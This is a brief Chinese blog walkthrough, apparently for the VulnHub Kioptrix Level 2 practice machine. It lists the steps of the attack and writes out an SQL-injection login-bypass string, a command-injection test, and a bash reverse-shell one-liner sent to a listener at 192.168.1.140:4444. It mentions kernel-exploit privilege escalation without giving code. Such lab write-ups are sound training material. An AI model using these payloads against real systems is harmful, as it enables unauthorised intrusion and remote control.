vulnhub靶机 Kioptrix Level 2
下载地址
https://www.vulnhub.com/entry/kioptrix-level-11-2,23
信息搜集
扫描IP地址
扫描端口
80端口
万能密码登录
用户名:admin’or ‘1’ = ‘1 –+ 密码随便写
登录成功
命令执行漏洞
输入127.0.0.1 | ls 成功执行命令
反弹shell
1 | 使用bash反弹shell |
kali 开启监听
浏览器输入:127.0.0.1 | bash -c ‘exec bash -i &>/dev/tcp/192.168.1.140/4444 <&1’
成功拿到shell
提权
查看内核版本
搜索exp
将exp上传到靶机
编译exp,执行exp,成功提权到root
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Sword技术分享!
评论